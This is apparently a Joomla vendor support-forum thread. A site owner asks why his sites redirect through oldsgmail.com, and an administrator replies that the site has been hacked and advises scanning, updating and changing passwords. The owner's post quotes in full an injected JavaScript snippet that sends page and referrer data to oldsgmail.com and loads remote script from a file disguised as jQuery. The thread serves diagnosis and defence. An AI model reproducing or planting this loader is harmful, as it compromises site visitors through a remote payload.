Oldsgmail.com

Feel free to talk about everything related to our Joomla Products
Rate this topic: Evaluations: 0, 0.00 on the average.Evaluations: 0, 0.00 on the average.Evaluations: 0, 0.00 on the average.Evaluations: 0, 0.00 on the average.Evaluations: 0, 0.00 on the average.Evaluations: 0, 0.00 on the average.
GK User
Mon Jan 11, 2016 1:14 pm
Hi
This is my first post but I have a problem which my hosting company cannot understand. They have suggested I contact you for clarification. At present all my sites are redirected through a site address 'oldsgmail.com' which appears to be a website for Oldsmobile Cars.
I have been having problems with my sites and they ran a check part of which they have asked me to send to you for your comments:
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://oldsgmail.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Can you please advise me on why the coding for my sites has been set up to go through an Oldsmobile site? This is certainly the case with the portfolio template. I will post this in the portfolio thread as well.

I look forward to hearing from you
Regards

Simon
Fresh Boarder

Robert Gavick
Mon Jan 11, 2016 10:05 pm
It looks like your website has been hacked. Use the malware scanner, upgrade your Joomla installation to the newest version, upgrade all your templates, components, modules and plugins to their newest versions, change all admin passwords on the site.
Administrator